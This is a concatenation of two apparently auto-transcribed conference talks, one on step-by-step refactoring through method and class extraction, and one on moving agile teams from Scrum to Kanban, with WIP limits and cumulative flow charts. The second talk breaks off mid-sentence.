instance method that we delegate to. Okay. And again, what I'm doing is I'm doing more and more method extractions within the runner class. So, if you're starting to see a pattern here, all I'm doing is doing these recursive method extractions. That's it. I'm not asking you to look for particular smells. I'm just asking you to break this down into smaller, little manageable bits. At the same time, you also might notice that I've taken the run method and I've made it an instance method, which fixes the problem since now that we're not no longer dealing with statics, but at least on a cosmetic level. So what's happening, what we need to do next is make the whole class, basically we need to make the whole class an instance class with possibly its own state in more complicated examples. The other thing that you will run into when you are doing this kind of refactoring is when you start extracting bits out, resharper will start complaining about missing fields. There's certain properties that are no longer there because naturally it's referencing something that was in the original class that is no longer there. The nice thing about those little errors that we normally consider to be errors is the fact that it's actually a design tool. It's a design tool that tells us what needs to be moved at the same time we don't have to worry or second guess about what the design needs to be because it's pretty simple. You need to fix this. If you don't fix it, it's not going to compile. So in this case, I've made the run method an instance method, but let's see what the next step is going to be. So by now this should be getting very, very repetitive and it should be because what I'm actually doing is I'm grouping this into another region and when I group it into another region, I'm trying to describe what it does. The other thing that you have to keep in mind is that it might seem silly that I'm actually grouping it into one region because I only have one set of things that are actually being done. I mean, technically I could take the contents of everything in that region and just dump it and extract it into another class, but that's not always the case in production. You might have classes that do six or seven things at once. It might take you hours, I don't know, maybe even days to chop a class down into a long set of single task methods. And even when you get to that point, you need to have a way to organize these methods in a logical fashion without running into analysis paralysis. And the simplest way to do it is to group these methods into these regions and do another extraction, which is what I'm doing again. Oh, lovely. Okay. So what I did here is I jumped a couple of steps, but essentially what I have done is extracted out the number printing portions of this class. The idea here is that we are going to recursively extract every single one of these methods out until both all the methods do one thing and all the classes follow the single responsibility principle. And when I say the single responsibility principle, I'm being very Nazi about it. I'm even going to say it's maybe just a single method or even two methods because this technique allows you just to keep extracting ad infinitum. There are trade-offs and we'll get into that in a second, but the idea here is that we're breaking it into manageable little bits so that when you come back to it later, you know exactly what to fix as well as you don't have to worry about the duplication because we're effectively removing all duplication. So to recap, all we're doing is method extractions. We're inverting if statements to make sure that we simplify it and flatten out the arrow code. And third, we keep doing these class extractions to the point where there is absolutely no duplication left. There's no duplicate sets of responsibilities. There might be cross-cutting concerns, but that's a different issue. But for the most part, it's going to be clean. And when you get to a point where it's clean, depending on whether or not you want to use an IOC container, it's going to look something like this. The classes all have essentially one method. It's simple. And the best part about this is I didn't have to think about any abstractions at all. In fact, I didn't even introduce any features that weren't already there. I didn't introduce any design patterns. I didn't even go as far as to say that you don't use design patterns unless it's inherently already in the code because it doesn't make sense to introduce any other complexity here. So this is as far as you will ever get without the IOC container. I've decomposed it to a level where the container itself, I've decomposed it to a level where it's still using concrete classes. There's still a whole lot of coupling because there's nothing really to abstract away the construction. Now, there's two ways that you could actually go with this particular piece of code. If you want to go traditional and go with no IOC container, then you basically have to wire up the constructors yourselves. So if I were to delegate everything to an interface, then what you would have to do with these interfaces is you'd have to provide a default constructor that would create the default implementations for those interfaces. Okay. Now, before I jump to the next thing, does anybody have any questions? Is this pretty clear? Because I realize a lot of this stuff is monotonous. It's not the most exciting topic. As much as possible, I try to do regions. Okay. So his question is, do I do regions top down or bottom up? Now, as much as possible, I do top down. The reason why I do top down is because if you were to do bottom up, you have to drill all the way down and try to break everything into these small little bits, which is basically the point of method extraction. So what we're trying to do with regions is two things. Number one, we're trying to group regions into, actually, we're trying to group code into something that we could understand. And the second thing is we want to hide code so that we could understand, we want to hide code so we could understand what's going on around it. So, for example, if I have an if statement and I had those two, three thousand line blocks, it's safe to say that it's impossible for me to understand what's going on in those three thousand lines of code, at least not on a, unless I wrote it myself, which, but I would never write something that messy. So the idea there is we want to hide those two, three thousand lines of code. Once you've hidden those two, three thousand lines of code, then you start working inward. Because the other thing about these extractions that you do with when you try to hide regions is that you could actually extract those regions. So, an example would be if I had a method and that method was three thousand lines long and there's several if statements in it and I collapsed it, what's going to happen is I could actually just put these things into regions. And once you have them all in regions, guess what? You could actually take those region names and make them into method names. All of a sudden, you divided a problem that is three thousand lines long into maybe two fifteen hundred line methods. So, this whole process is all about dividing conquer. In fact, there's nothing special about it. I've actually just restricted the amount of refactoring that you could actually do. And in this case, it works out because you don't have to think about what the model is going to look like. At the same time, I'm not telling you to introduce any abstractions that aren't already there. I'm actually just telling you to move the code from one class to the other, which is easy. And if I were to go further in this example, the only thing that I'm actually doing is I'm extracting interfaces out from the code and then once I extract the interfaces, I have a composition root that does all the nice things like put all the pieces back together again. And it works just as if I never touched it in the first place. Any other questions? You know, I know Norwegians are really, really shy, so I have to ask again. So, does anybody have any questions at all? Noon? Yeah, I have to admit that, yes, you do admit, I mean, you do get more lines of code, but in this case, it isn't about lines of code as it is about being able to manage and change the code. For example, if I go all the way to, say, the last step, which is completely refactored, if I wanted to just change the program so that it would do something else, like I don't know, maybe print every third or fourth number or any other pattern, all I would have to do is look at the interfaces, come up with my own custom implementation of these two interface, three interfaces, and plug it in. And it would be pretty trivial to do so. And if I were just to stick with the regular code, assuming that it wasn't FizzBuzz and it was something horrendously big, then you couldn't do the same thing. So lines of code is not necessarily what we're after here. What we're after here is being able to maintain the code and keep it in a clean state so that if we wanted to change things, it would be practically effortless. And in this case, it is. Any other questions? Yeah? Okay. How is TDD evidently in this refactoring technique? So TDD is the assumption for this particular technique. I mean, you have to, I've tried this before with TDD, but the problem is that you, let's face it, you have to have tests that back the behavior and test this behavior. Because if you change this, there's no guarantee that it'll work the same way. I mean, I used to say that you could get away without tests using this method, but you can't. Ultimately, this is just one part of the TDD cycle, which is red, green, refactor. The assumption here is that you've already have the test in place. You just need to be able to refactor this so that it's in a cleaner state. If you don't have tests for this, then the first thing that you do have to do is wrap tests around and then that's when you can change it. Because that's the only same way to go about doing this. I can't recommend any other way than that. There's just no way to shortcut that. I'll take one more. Sweet. Okay. Thanks for coming, guys. Thank you. Thank you, guys.
|
Have you ever wondered if there was a better way to learn refactoring? Martin Fowler's Refactoring book was a great introductory book on how to clean up legacy code bases, but over the years, what I have found missing in that book is one a set of guidelines that links all the different types of refactoring techniques together into one continuous process. In this talk, I will show you how to take almost any code base, and refactor everything from the simplest nested' 'if' blocks all the way to extracting an actual domain/object model to using an IOC container framework., Using a set of repeatable steps, I will show you how easy it is to refactor almost any code base, even if you don't understand every part of the application.
|
10.5446/50986 (DOI)
|
Hello everyone, my name is Rachel Davis and I'm going to be talking to you today about moving from scrum to Kanban. Now this is actually the first time I've given this talk, I've given lots of different talks and this is when I was talking to the organisers they said it would be good to have a presentation about Kanban and I thought actually what people are struggling with is to move or to figure out like if we were already doing some form of agile, how do we get the best of both or why would we want to change. So a little bit of background about me, so I started out as a software developer but I have become a bit post technical so I haven't been writing any code for about the last five years, I did work in an XP team in 2000 and I was doing test driven development and pair programming so really the methodology that I know best in the agile sphere is XP. Then I moved into becoming a coach, lots of organisations are wanting to get started with scrum as an initial approach so I've been working with scrum teams probably for the last six years and more and more the teams that I'm meeting are looking at other ways of bringing lean ideas into the way that they work and Kanban is a particular approach that has been starting to be more widely adopted and then people are trying to work out do we go that way or do we not go that way or do we kind of have a scrum band mixture. So also I have written a book about agile coaching so that's, I don't think it's at the bookstore here, there's a different one about agile coaching. So please I know that this is Norway and you may not feel like perhaps I was asking questions but please I do encourage you if I'm talking about something and you have a question you think I wish she would talk about this, raise your hand, let me know that you have a question. So my experience is in the industry lots of teams are using scrum, some people have heard about Kanban, some teams are using Kanban and this talk is really about how to evaluate whether it's a good thing for you to use and also what would you need to do to get started. I'm actually going to start by talking about scrum because I think if you're moving for any reason it's usually because something isn't working. So let's talk about what are the things in scrum that might not work in the organisation that you're applying scrum in. So just before we get started in that, who here is using scrum in their organisation? Okay. Now here's a very simple diagram, this is kind of a might cone diagram of what scrum is. So it's a framework for developing and sustaining complex products. The core part of it is that you have a backlog of feature requests and you're going to work in sprints and you make a little sprint backlog for the sprint that you're working in and every 30 days or less you're producing a product increment and every day you're getting together as a team, it's a team approach to kind of work out how are we going to get towards delivering that product increment. Now, so sprints are really this time box and this is the key difference between scrum and Kanban is that scrum is a time box driven approach. Now, this is like how it should work, this is the ideal view. Sprint, product increment, sprint, product increment, each sprint is like a mini project in itself, producing something that could be valuable and used and going live and people using it and giving feedback but it's not really what I see most of the time when people are actually implementing scrum. So the good thing about sprint is you have a clear goal and if you were in Esther's talk earlier on, one of the things that brings a team together is you have a shared goal. So planning a sprint, we all get together as a team, we figure out what our goal is for this month or this two weeks and then we're working towards it. So we've got a reason to collaborate and we're not being pulled off onto all sorts of other different side projects. We've got we're on this sprint, this is our goal and we're not also doing this and this and this other thing. Now, the upside of that is actually from the outside, stakeholders know how to engage, they know when to expect things, there's a sort of rhythm to the development, you have regular meetings where people can see what's being developed, there should be demonstrations of the latest product increments, sprint reviews and there's a cycle for people to know when do they need to get their features ready for consideration for the next sprint. So it's a good coordinating mechanism. Now, let's talk about some of the downsides of scram and I'm going to ask you also whether you've experienced any of these. So one of the downsides of sprints is like any deadline. So we have a date, we have to do stuff by, we may have planned slightly optimistically, there were the unexpected things that went wrong and so often it feels like that crunch time at the end of the sprint where we rushing to get things done, things that may be not done as properly as they should be. There's a little bit of a rush on testing, a little bit of compromise on design and you often end up with things that didn't quite make it, things that didn't get finished or even didn't get started. One thing I think is that this idea of having a time box creates this sort of strange way of packaging up items because the items are packaged up as bundles that fit in a time rather than sensible bundles of features that you might actually want to consume and use. So partly you do end up with this kind of one, we've made a product increment but it's not really what we want to go live with yet so let's make another one and let's make another one. So I don't know who has come across this term scrummer fall? Anyone? So there's a guy called Brad Wilson and he, I think he describes this as the combination of scrum and waterfall to kind of the worst effect. You can see what I mean, but it is very common in large organisations especially working on large products and you might actually have parallel teams working on this that you have a bit of a requirements phase and then the sprints are really seen as the development phase with a bit of testing thrown in. So you're doing your sprints, you produce a product increment, you put it on the shelf and then you produce another one and another one and nobody's really that interested in the product increment you made because it's not really going to go anywhere, it's going to be stacked up and in six months time we're going to release something. So then it means that sometimes the testing isn't fully resourced and we don't get round to doing all of the testing until maybe the fifth and sixth month and maybe we don't have all the people on board the project and maybe now we're getting towards that end point and some of the people involved in the requirements are no longer involved, they're looking at phase two. So you get some of the classic things you would get with waterfall but you are really getting some improvements through having a good coordination within the team. So the team is more focused but the general product or product development is still a big lump of software that's being built. So I don't know, I'm going to ask Sherr of Hans, has anyone seen this kind of situation? A few people. The thing is it's not wrong and I'm not here to judge or say this is wrong, it's just that some of the practices make less sense. Naturally the stakeholders just feel like well I could go and I could go to the demo but on the other hand that's not really what's going to be released. So maybe I'm too busy right now, I'll go next time and then maybe they go to the last one and then they're going that's not what we wanted. So you can get this kind of scrum waterfall situation. There are some other things which are in scrum which I think teams find challenging. So one of them is burned down charts. So who here uses burned down charts in their teams? This is often a source of confusion and mystery. Burned down charts are supposed to make it easy for people to see what's going on but just purely having a slopey line that's the ideal line and a sort of line that is where we're at at the moment often doesn't communicate that to people. It's not enough information because it doesn't kind of say where the work is. It's either things are finished or they're not finished but you can't really tell within the team what the state of them is. So here are a couple of pictures of burned down charts. They're just random pictures that I happen to have on my laptop and one of them and what you'll find is that they don't look the same for a start and you can work in organisations by different teams or using different burned down templates and from a stakeholder point of view that's quite confusing. This bar version has things that were added after planning and things that were removed after planning. Now if you know about Scrum you know that you're not really supposed to do that but it seems like this team is kind of doing it. They've adapted their burned down chart to kind of show well this is why we're running late because we have to do other stuff instead. So we're not really even using that sprint as a protected capsule around the development. There's another one I found and on my laptop I had found that I'd named this crazy burned down chart and it's because it is crazy. It doesn't actually help you know what's going on. I think what does it tell you? It tells you somebody had too much time on their hands to do tracking I think and I don't think it really helps to see where the work is. And so one of the techniques you can use in Kanban is this cumulative flowchart stuff which I'm going to come on to and that's sometimes a way to get a clear review of what's going on. Now the other thing that is a bit of a mystical thing within Scrum is product backlog grooming. Now product backlog grooming is really the art of going through the near items on the product backlog and trying to understand what they are and get them clear. It's not really requirements analysis. It's much more trying to figure out what should be in there, what is valuable, what's the next thing we should really be working on. But people find that it's somehow invisible work. The team is having daily Scrum meetings and they're focusing on what we need to do today and the product backlog work kind of always takes second place. So you end up in this situation where people kind of get towards the end of the sprint and they're going, ah, we better get some stuff ready for the next sprint otherwise our planning meeting is going to take for ages. So this is, but it isn't visible work typically. If you look at the burn down chart that doesn't really tell you where you're at with your product backlog grooming. And Kanban can help you with that. So there is one other thing that I wanted to mention and I didn't put a slide on it just because I thought it's contentious, which is estimating. So one of the things that I see in Scrum teams very often is a lot of confusion about what units we're estimating in, complexity points, ideal days, what does a point really mean? You know, people are always constantly thinking, right, when we say one point we really mean half a day or three hours or, and then there's a lot of discussion. There's a lot of time that the team puts in in terms of to try and estimate their product back, to try to get these magical numbers. And yet are those numbers that useful as an art to predicting things? So, and when you do Kanban, one of the things that I think people are attracted to Kanban is they think, great, now we don't have to estimate everything. And that's not necessarily true. You may still want to do estimation and you may still need to do product backlog grooming, those kinds of activities. But there is an illusion that people move to Kanban because they think they will get rid of planning meetings. And I don't think that's the case. So, let me talk about Kanban now. Now, I also want to know who here is using Kanban. Is anybody already using Kanban? Few people. Cool. And I should say, I'm not pro Kanban or pro Scrum, I'm kind of pro sensible things to do that work for the team. So, I'm trying to really say what's in Kanban that you might be able to use for your organization. So, Kanban is, it's really the Japanese word for visual signal card or something like that. I'm not, I don't speak Japanese, so I may be entirely wrong. But to me, it's all about visualizing the work and using visualization as a way of triggering what we need to do next. So, you need to take some care in thinking about how we visualize it to make it something that people will respond to. Now, there are a whole bunch of books that have been written about Kanban for software development. So, one of these, and I guess one of the main proponents of Kanban is David Anderson. And he's written this book, Kanban Successfully Evolutionary Change for Your Technology Business, is his title. There are other books. There's a book about Scrumban. There's also a book which Henrik Niburg has written. I think there are a bunch of different books, there are a bunch of different papers. People have been really trying this approach out. But it hasn't, I would say, it hasn't really settled into, this is what we all agree Kanban is, isn't just the same as this still debate within the Scrum community about what's the correct unit to use or the right way to draw a burn down chart. So, you will get conflicting opinions within the Kanban arena, I guess. Now, what this does is it really uses two techniques that are really from the lean product development environment, I guess. One of them is making things visual. And the other thing is trying to focus on flow by limiting work in progress. So working on fewer things, having shorter lists of stuff, having less inventory in the process. So a key thing about visualizing is if we can start to really clearly see what the flow is, we can start to get the rocks out of the way to improve the flow. If it's too difficult to see what the steps that things go through, then it's harder to really look at optimizing the end to end flow and people tend to do something called local optimization. They tend to kind of say, well, let's just get the bit of flow between you and me working rather than let's look at the end to end flow. And people are very naturally thinking about it's very difficult to let go of what is the most efficient for me versus what is most effective as a throughput for the system. So it's something that feels counterintuitive because everybody feels they should just be busy all the time. But at the same time, if you're busy, then you may be working too far ahead on stuff that you may not need. And actually your attention might be better placed into improving the system. So one technique that you use within Kanban is to just start making the cues of work visible. So you're starting to make the inventory of work in the system easier to see. So this is just a picture of wait times at Disney Park. And because it's displayed, it allows people to make a choice. So what you're really trying to do is not just make the system cues visible to the people working in the system, but also to the people who are making choices so that people understand what the typical wait time to get something is. If I'm asking for a feature and I don't really understand how long it takes between something going on the product backlog and something actually coming out and being released, which can actually be weeks and weeks in some organizations, then I will not be making well informed decisions. So it's trying to make information available to help people make better decisions. And what you're doing here, it doesn't say how many people are in the queue, it's just telling you how long will you have to wait before you get something. And what typically you do in Kanban systems is you move much towards cycle times. What's the date we started working on something and the date we finished working on something, rather than thinking about points or what points are to time, those kinds of things. You're looking at cycle times. Now here is a picture just from a scrum team. And this is their initial steps towards Kanban. So they are starting to make the work visible. Now I don't know if... Can you make any inferences from this board? Anything that you would... observations you would have about it? Can you see what's going on? Easily. It's a bit messy for a start. And actually if you're going to get into making things visual, you have to take care that things are easy to read, that it is clearly set up, that column headings are clear to understand. For example, this board has a kind of a blocked area, kind of towards the top here. But it's not really clear what's in the blocked area, where the blocked area ends or how things get in there or how they get out of there. And if you took a closer look at these tickets, so they kind of started with good intentions. They thought, well, what will you use something to print out the tickets in our defect tracking system? Because that's what they're using for their planning software. But the thing is that the program that they're using, the main thing it prints in big, big letters or rather numbers is the reference number. So if you look closely at this, it's just a whole, all the big bold text is some long reference number. So in the standard meeting, people are saying, well, I'm working on issue number one, two, three, five, six. And that's not an easy thing to communicate. The other thing that it may not be clear from this board is there's two teams. They work, once they're both writing software to run on internet enabled TVs for the Olympics. And the team at the bottom is using a particular browser. The team at the top is trying to do a HTML version. But actually what you'll see is there's a blank area in the top team. And that's because that area is ready for test. What they're doing is they're working in one week's sprints. And then at the end, they kind of go, put everything over ready for test. And then nothing gets tested in that one week's sprint. And everything carries over to the next. And so they're kind of got a, sprints are being used to build stuff but not build and test. So there's no meaningful product increment. And actually also then, the kind of demo that they have isn't a normal sprint review. It's kind of a management walk around where people show things working on the TVs in their area. So again, there's no real accountability to this is what's working and tested. It's more and more like, you know, here's some stuff. Look how cool it is. And then, so it's not an integrated team in terms of the development and the testing. So you need to do a little bit more than just make the work visible. You start needing to just try and sort of focus on, let's not have too many things going on at once. So Kanban is used in the Toyota production system. This is really going back to more lean manufacturing, lean production. And if you go to a Toyota factory and look at the production line, they're also used in multiple ways to control the flow. So each order for a car has a Kanban card that goes with it, that goes through the production line with it. Also, the stock around the different cells on the production line have their own systems of cards so that you don't have, you know, 100 wheels, you just have a stack of 20. And then as that gets used, you pull in another 20. So they keep the supply chain, the supply levels low so they're not building up batches of stuff. So they don't on Monday make a batch of red cars and on Tuesday make a batch of black cars. They have to change their paint system so that they can make a red car, follow a black car, follow a white car. And that's really improved the flow. So they're using Kanban to be the ticket for the order and they're focusing on how can we improve the flow per order through the system. Now so this is, I guess, a little bit of a sketch of something that's really a bit like the team we were looking at before. They've got some stuff that they're about to work on, there's the stuff that they are working on, but they don't really have anything ready for release because they're really thinking our real release is to make something available for the Olympics. And these mini one week sprint product increments, well they're not going anywhere so we don't really care about them that much. So one of the things to do is to start focusing on releasing stuff. So to have fewer things in the pipeline and actually get that all the way released. And when you start limiting the work in process, so you're perhaps doing less product backlog grooming now and you're now focusing on what's the next thing to release and what's stopping us from doing that. Now as well as having boards that visualise this flow, you can also use a technique called cumulative flowcharts. So I don't know, is there anybody here using cumulative flowcharts to represent what their board information is? Maybe I should also ask, is anybody using a board that looked like that board I showed you with columns and cards on it? A few people. Now who is not using a physical board but they're using an electronic board? Now there's absolutely nothing wrong with using an electronic board. The same principles apply, it's just easier and more tangible to explain it with the physical cards. And I think when you have the limits of a physical board with physical cards on it, you start to realise that you've got too much work in progress more quickly. When you're using an electronic system, it's often easier to keep adding and adding and adding rows and tickets and then it starts to be a lot of things that you're discussing when you have your daily scrum meeting. So cumulative flowcharts, I think I see them really as being a more useful version of a burn down chart because what you're trying to do is trying to make not just the general trend line visible but actually the view of how many items are in each of the columns of your board. So I'm just going to go through a few examples. So here's a very simple one and I've just tried to keep this simple so that you can get the basic principles. So you'll notice that the vertical axis is not points, it's not ideal days, it's number of things. So it's just number of items in any one state which makes it quite easy to create it because you just look at the board and go one, two, three, five, okay, and then on the next one and you usually do this in a spreadsheet. I haven't been using planning software to generate these, I've been using spreadsheets. This is a very simple process, it only has three states. So it's like there's some work that's on the product backlog that we haven't started, there's the work we're actually doing and there's the work that we've released and what you'll see is that the green stuff is gradually increasing at a steady rate and you can look to see how many items are in process at any time and you can look across ways to see roughly how long does it typically take and you'd start to look at what average cycle times are for things. It does assume that items are roughly similar sized so that's not that you know and if you've got odd shaped items your flow will be a bit more ragged. Now if you're doing scrum then what you'd see is really this kind of slightly stop start, you know you release some stuff, you do another sprint, some more stuff released, you do another sprint and if you use Kanban you're not using sprint so Kanban doesn't have the idea of wait until the end of a time box, you really are releasing as you go. So as soon as something is finished release then the next thing release. So it works very well with a continuous deployment setup. Now just to illustrate what Scrummaphore would be like if you used a cumulative flow chart you probably have a lot of different states and notice that many weeks go by before you actually have anything ready to release. So it's you're not generating the value, there's a long cycle time there before you get your value. Now what these charts can help you see and what the boards can help you see are bottlenecks in your process and bottlenecks the definition from the goal is any resource so that's a person or a thing or a machine that their capacity is less than the demand placed on it. Now it could be we've got six developers and one tester, that tester then becomes the bottleneck. Now if we added six testers the bottleneck would normally move somewhere else, it's normal in a system to have some bottlenecks and typically what people do to cope with bottlenecks is they create some buffers in their system. So what if you know that you have a bottleneck what you don't want to do is have a situation where that person is waiting around not doing anything. So you just think about the classic thing you might do in scrum where the development team is busy developing stuff and they haven't made anything available to test and then they say oh right the last day of the sprint is everything to test, that person really can't then cope. You want to level the workload and have some buffers they've got some stuff ready to test that they can pull through the system. So what you start doing when you're using Kanban is you first of all have some basic columns and then as you start to understand your workflow better you start introducing some buffers to try and smooth out the flow so you get a better throughput. Now yes. Yes, yes, yes, I'm coming to that. So I'm not yet talking about how you start doing it. I'm just trying to explain roughly what Kanban is and then what other steps that you would take. So yes, I agree with you. Yes. Any other questions just before I move on? Yes. Yes. Yes. Yes. Yes. So that's an interesting thing is that Kanban is a technique from a production line. Knowledge work isn't a production line. You're creating unique things every time and actually in software development the items are very much different sized. You can get something very, very small like change some text on a page or you know, great build this new component or you know, improve this performance and reliability of the system. They kind of different sized items and so one of the challenges really is that Kanban works best for similar sized items. So typically what teams might do is have columns where you're trying to break those down. So visualizing that product backlog grooming activity so that you're breaking things down into similar sized features so that then you can start to use this kind of flow based approach. Yes. Yes. I think that's actually a challenge for Kanban. So for instance, non-functional requirements or quality attributes, they are things that you have to be checking all the time rather than you can't say, oh well we've done the architecture because you keep changing it. So to some extent or you know, you can't say sprint one, we've delivered performance because you're going to keep having to keep checking that it's keeping to a level performance. So I agree. But I think that's an issue with both Kanban and Kanban. You have to figure out a way to do that and being clear about the measures that you have and the way that you're going to inspect for those measures is part of the answer. So I'm going to move on a little bit now. So this cumulative flow charts, I showed you some kind of ideal ones which are a little bit smoother. Typically what you start to see is that these bands start to expand where there's somebody who's blocked and waiting. And so what people start doing in a Kanban system is they introduce these whip limits. Whip is short for work in progress. And so what you're trying to do is impose a limit of how many things can be at a particular state. And what you're doing is that the way you operate those limits is that supposing you are a developer and you see that there are three things that are already in development, if one of them gets blocked, you can't start another one. You have to try and figure out how to unblock the thing that is blocked or go to help somebody else where there is a further upstream activity that, downstream activity that needs to flow through. So I've got some text to write that out because I think sometimes that gets confusing. So how do we operate whip limits? This is some text from David Joyce who's been running some Kanban teams at the BBC. So the limit governs the maximum number of work items that can be in any state at any instant. And if I haven't reached the limit, I can pull more work in. I can start doing some more stuff. But if I've hit my limit, then you can't start working on some more stuff and you actually have to either wait, focus on process improvement stuff, or try to help unblock the system. And that really relies on team communication. And it isn't helpful if everybody tries to help too much, if you see what I mean. So if you probably want to in your team kind of go, oh, we're blocked on this, right? So maybe you and you, we're going to work to try and block it. And you and you, let's try and look, do some look ahead work and perhaps not focus on the making more stuff. What we're doing instead is we're thinking about how we can improve things, maybe looking at tools, ways of, you know, improving the way that we work. Now, this is kind of a very ideal picture. But really, this is where you've got quite narrow work in progress limits. And what you'll see is that the flow of items is happening more that you're getting things out of the system very soon. So almost as soon as you finish something, it's going live, soon as you finish that something, and you're just focusing really on keeping that cycle as short as you can. Now, I'm going to flip into talking about how you might get started with Kanban. So the very first thing I think is you start with a technique which is called value stream mapping. Now, to formally do value stream mapping, as in the kind of leading textbooks, you really try to follow the work and use examples and look at how specific pieces of work, how long they actually take, where do they wait around. So if you imagine, you might write a requirements document, and then it might be waiting to be signed off, and you might have to wait for the steering committee to get together and then wait for a team to be formed, and there could be all of these different steps. Now, it's helpful to do these practical examples where you actually follow a piece of work and look at how long it really takes to get through, but often in terms of setting up a board for a team to use, you may be better off to start just sketching out what is it we think our workflow is, and so what happens in this picture? There is a little stick person, and he's starting to create a book of work. So he's working in a bank, and he gets traders asking him for stuff, and sometimes he says to the traders, no, and other times he says, oh yeah, that sounds like a good idea, yeah, let's put that in our book of work, and so that's your first cue of work starting to form. And then you start working with the team to figure out what would it take to do these things. Then needs to be a bit of analysis to understand what the impact is, where the piece of work will have to be done in the banking system, so you're doing some of the sort of analysis work, and so then what you're doing in this team is really discussing what is the flow of items, and this team, so I mentioned about estimating, this team do choose to do estimating, they say, well, we want to do some t-shirt sizing just so we can decide, like if something is too big, we might need to actually have some meetings to break it down. They also started at the, I don't know if you can quite see, but at the bottom here, they start having some definitions of done around the columns, but not a definition of done at the very end, but is this ready for us to move forward to the next? And then there are some little buffers starting to appear. Now, this is just what it looks like, it's a sketch, it's what they think they might do, it's a future sketch, it's an illustration, it's not a precise process definition, but it helps to have that conversation and start talking about what the process is, what the states that the work goes through, and where does it wait around. But practically, the team is only going to know how does this system work when they start operating it. So this initial thing, get the sketch done, then try it out. So step two, the team is now based on their whiteboard sketch, they've started to make a board design. They have some names at the tops of the columns, they haven't put their whip limits on yet, and that's partly because they want to get used to this new way of working. So, but notice that they have really tried to make it easy to read, make it clean and tidy, they've got super sticky post-it notes that won't fall off, they have, you can't quite see it, but they have some magnets that they have bought to represent team members, they haven't put those on yet, and they've started, those definitions have done that they had, they printed them out and they put them at the bottom of the columns. Now, that's, this is a board of just representing where's our work at the moment, then they start using it. And in Canman, you typically do have a daily standard meeting, but what you do in your daily standard meeting is you are looking to see, is the board representing work at the moment? Are there blockers that are not being dealt with? Do we have any bottlenecks? Is anybody kind of blocked or too busy? And you're typically, and this is different than a SCRAM standard meeting, you're focusing, you tend to focus from the, I'm just trying to think of how this looks to you, from the done column end first, you're looking back to say, pull the items this way, you're not stuffing more things in, so it's a pull system. So, you're typically, when you're looking at the work, you're not looking at what's the next thing that we should work on, you're more normally thinking what's blocked that needs to be moved forward. And you tend to run this meeting, looking at, talking about the work, not a person by person. So, it's not driving out this kind of commitment, you know, what did you do today? It's much more saying where is this piece of work? And if you're not working on any of those things on the board, then you might not actually say anything. So, you're really trying to shift this into, does the board represent what we're doing, and do we need, does the board tell us that we need to do something different? Now, as you start doing that for a while, you can start to get a sense of what would be sensible whip limits for us to try. Again, this is our initial whip limits, we may need to reflect and add more columns, we may need to change our whip limits. But, I think, I'd be right in saying that David Anderson normally recommends start with high whip limits and then gradually tighten them. So, if you've just got a whip limit of one thing per person and then one thing gets blocked, you're running into blocked quite soon, so you might want to have slightly more relaxed limits to allow people to have something to do. So, now, this is the team after they've been going for a few weeks, and if you look, you can see that there's too much stuff on the board, and they haven't really been following the whip limits. So, this is a team that's still learning, and this is what you're trying to do with the whip limits is to become more aware of when you exceed them. The way that they've designed their board makes it quite easy for you to put another post-it note in, because, so you can see how many post-it notes are crammed into the prioritised backlog column, there's too many things there. One technique that I've seen teams use is actually design your board so there are literally only spaces for the amount of tickets that you're allowed to have, and then put a kind of a cross thing so that you can't, you're very conscious, oh no, look, we're going past our limit. So, you may want to think about that, but more crucially, what this prompts is we need to reflect on what's going on. So, this is a picture from a retrospective, and it is a picture of a cake that is shaped like a bug, and it has a number on it, which is 1133. This bug took many weeks for the team to sort out, and somebody in the team made a cake like the bug, and they ate the bug, but they also used it as a way to celebrate we've killed that bug, but how did it really happen? Why did it take us in this direction? Why was this so difficult for us to fix? A lot of that came down to not having the knowledge in the team, and they needed to expand their understanding of the other systems. This was a, something that was very difficult to replicate, that was happening in one of the databases, and it was difficult enough to replicate, and really, really difficult to figure out what was going on. But it was worth having a retrospective literally just about that thing. And what you want the team to do is to become more responsive to noticing what's happening, what's slowing them down, and thinking, how do we make sure that doesn't happen again? So, yes? Yes? So, that hasn't, it just hasn't been my experience that that's happened, but I can imagine it might happen, and if that is happening, it might be an indication there's too much stuff in going on. If you're finding that the meeting is kind of getting bloated, that's possibly too many things to discuss, we probably are trying to do too many things at once. So, my reaction would be maybe to, to kind of do less, have fewer blockers, and then have a smaller focus. Now, a question that a lot of people worry about when they're moving towards this approach is they worry about where do all our meetings go. So, I mentioned retrospectives. Now, normally in Scrum, we have those at the end of the sprint, and you know, like you have your release, or you should have your release at the end of the sprint. And so, in Scrum, the meetings are pinned to the time box, and the release is pinned to the time box. And what you're trying to figure out when you move to a Kanban approach is really, what's the real frequency that in your organisation, how often does it make sense to get stakeholders together, how much does it make sense to get the team together, do you need to have some meetings or some events that are triggered by hitting a limit. So, there are, when people move to use, when teams move to using Kanban, they're not throwing everything away. It's just they're starting to realise that they don't all have to be kind of bolted to this cycle, that you can have different frequencies for different things. So it's not that, you know, retrospectives disappear or go away. Now, I'm getting towards the end of the time, and I want to now take the other point of view and kind of say, well, okay, so what are the good things in Scrum that we might lose and, you know, what would we want to be careful about? So, you don't want to throw the baby out with the bathwater. I don't know if you have that saying in Norway, what are we doing in the UK. So, I have come across teams that have been trying to use Kanban, and things are not good. And I have actually been in environments where we have gone back to using Scrum. Now, the kinds of things that were happening for that to be a thing that we decided to do was, and this is with a particular organisation, they were making a news portal, and they had, they'd just been making features as people suggested them. They had lots of features. It had kind of got into this business as usual mode, you know, somebody comes up with an idea, you just build it and release it. And it felt as if the team really didn't know where they were going or what they were working towards. They were, it just seemed like anyone could ask for anything. And so, there was this, and this is something that can happen to Scrum teams as well. It's like you just, you can't see the view outside the sprint. You can't see the big picture. You can't see the roadmap or the where are we going view. And if you can't see that, then it can feel demotivating. It can feel like, you know, I made, you couldn't, and I've experienced this on XP teams as well, is that we just release features and we release features and we're an effective team, but it feels like there's nothing big to celebrate. We're just doing lots of small releases of stuff, and we don't really know where we're going. And you can lose this sense of what is the product we're making or what's the big release plan, you know, where's our product going. So, sometimes, and especially if teams, and I've seen this where a whole bunch of people have joined an organisation and they've just kind of gone along with what's happening. So, there's a big Kanban board and they have a stand-up meeting and then they kind of go away and they don't really know what anybody else is doing. There has been a lack of the meeting coherence because if you think about it, one of the things that Scrum does is it gives, it helps the team establish a goal which binds the team together. If you have a big mass of people and it's not very clear what the goal is, you can end up with factions and with people not getting on as a team. So, that's something to watch out for really is that people are starting to just feel like a cog in a big machine and they're not really feeling accountability, they're losing, it's that big team effect that you end up having. So, I don't know, does anyone recognise what I'm talking about this kind of effect? So, what I've found is actually it can be helpful to get back to basics sometimes. Sometimes it does help to say, right, this is a product we're working on, this is the 